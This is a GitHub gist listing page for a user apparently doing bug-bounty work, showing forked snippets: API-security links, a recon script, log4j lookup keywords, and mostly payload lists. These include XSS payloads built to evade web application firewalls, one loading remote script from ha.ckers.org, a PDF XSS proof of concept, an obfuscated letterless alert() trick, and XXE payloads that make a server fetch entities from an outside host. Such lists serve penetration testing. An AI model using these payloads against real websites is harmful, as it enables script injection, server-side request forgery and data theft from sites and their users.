Nasur Ullah Spy0x7
π’
Spy0x7
/ API pentesting
Created
February 27, 2022 09:22
— forked from cyberheartmi9/API pentesting
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://github.com/HolyBugx/HolyTips | |
| https://www.apiopscycles.com/api-audit-checklist | |
| https://github.com/inonshk/31-days-of-API-Security-Tips | |
| https://github.com/shieldfy/API-Security-Checklist | |
| https://web.archive.org/web/20210607123429/https://www.binarybrotherhood.io/oauth2_threat_model.html | |
| https://assets.pentesterlab.com/jwt_security_cheatsheet/jwt_security_cheatsheet.pdf | |
| https://cheatsheetseries.owasp.org/cheatsheets/Microservices_security.html | |
| https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html | |
| https://apisecurity.io/encyclopedia/content/owasp-api-security-top-10-cheat-sheet-a4.pdf | |
| https://cheatsheetseries.owasp.org/cheatsheets/REST_Assessment_Cheat_Sheet.html |
Spy0x7
/ XSS Payloads (WAF Bypass)
Created
February 22, 2022 12:09
— forked from RajChowdhury240/XSS Payloads (WAF Bypass)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |
Spy0x7
/ urlscan.sh
Created
February 21, 2022 08:50
— forked from bendtheory/urlscan.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| curl -s "https://urlscan.io/api/v1/search/?q=domain:$1" | grep -E '"url"' | cut -d '"' -f4 | grep -F $1 | sort -u |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "></style><script>a=eval;b=alert;a(b(/ xss fired/.source));</script>'"> | |
| ';alert(/xss fired/)//';alert(/xss fired/)//";alert(/xss fired/)//";alert(/xss fired/)//--></sCRipT>">'><sCRipT>alert(/xss fired/)</sCRipT> | |
| ""});});})'"--></SCRIPT>>'"</style>>'"></title>'"><marquee><h1>'"R3NW4</ | |
| h1>'"</marquee>:;'"><)<SCRIPT>prompt(/xss fired/)</SCRIPT>'"$ | |
| \';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";</SCalert(String.fromCharCode(88String.fromCharCode(88, | |
| 115, 115, 32, 66, 121, 32, 72, 51, 65, 82, 84, 95, 66, 76, 51, 51, 68), | |
| 83, 83))RIPT>\">\'><SCRIPT>alert("xss fired")</SCRIPT> | |
| ';alert(/xss fired)//\';alert(1)//";alert(2)//\";al+ert(3)//--></SCRIPT>">'><SCRIPT>alert(/xss fired/)+</SCRIPT>=&{}");}aler+t(6);function+xss(){//&q=';alert(0)//\';alert(1)//";alert(2)//\";alert+(3)//--></SCRIPT>">'+><SCRIPT>alert(/xss fired/)</SCRIPT>=&{}");}alert(6+);function+xss(){// |
Spy0x7
/ demon
Created
December 23, 2021 12:14
— forked from iustin24/demon
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 00001 | |
| 00002 | |
| 00003 | |
| 00004 | |
| 00005 | |
| 00006 | |
| 00007 | |
| 00008 | |
| 00009 | |
| 00010 |
Spy0x7
/ log4j-keywords
Created
December 12, 2021 03:40
— forked from bugbountynights/log4j-keywords
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ${ctx:loginId} | |
| ${map:type} | |
| ${filename} | |
| ${date:MM-dd-yyyy} | |
| ${docker:containerId} | |
| ${docker:containerName} | |
| ${docker:imageName} | |
| ${env:USER} | |
| ${event:Marker} | |
| ${mdc:UserId} |
Spy0x7
/ wordlist_from_js.sh
Created
November 14, 2021 16:58
— forked from seqrity/wordlist_from_js.sh
Make wordlist from js files
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /bin/bash | |
| ## This script fetch js files from a domain name and make a wordlist by words in js files | |
| ##### Install requirements ##### | |
| ##### Before running this script you should install Go ##### | |
| ## Install subjs (https://github.com/lc/subjs) | |
| GO111MODULE=on go get -u -v github.com/lc/subjs |
Spy0x7
/ poc.js
Created
October 3, 2021 16:28
— forked from andripwn/poc.js
PDF Bypass - Cross-site Scripting (XSS)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| app.alert("XSS") |
Spy0x7
/ lol.html
Created
September 26, 2021 07:10
— forked from ignis-sec/lol.html
alert() without letters or numbers
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| /* | |
| γ±='',γ³=γ±,α=γ±+{},α=γ±+[][[]],γ±+=[γ±==γ±],γ³+=[!γ±],α=+[],α=+!+[],α=α+α,α=α+α,α=α+α,α+=α+α+α,α=α+α,α=α[α+α],α=α[α],α=γ±[α],α²=γ±[α],α³=α+α+α[α]+γ³[α]+α²+α+α[α]+α+α²+α+γ±[α],α°=[][α³][α³],α=''+α°,α=γ³[α]+γ³[α]+γ±[α]+α+α²+α[α]+α[α],α°`α³${α}``` | |
| */ | |
| γ±='' | |
| γ³=γ± //'' | |
| α=γ±+{} //'[object Object]' <- '' + [object Object] | |
| α=γ±+[][[]] //'undefined' <- '' + undefined |
Spy0x7
/ xxe-payloads.txt
Created
September 25, 2021 11:18
— forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |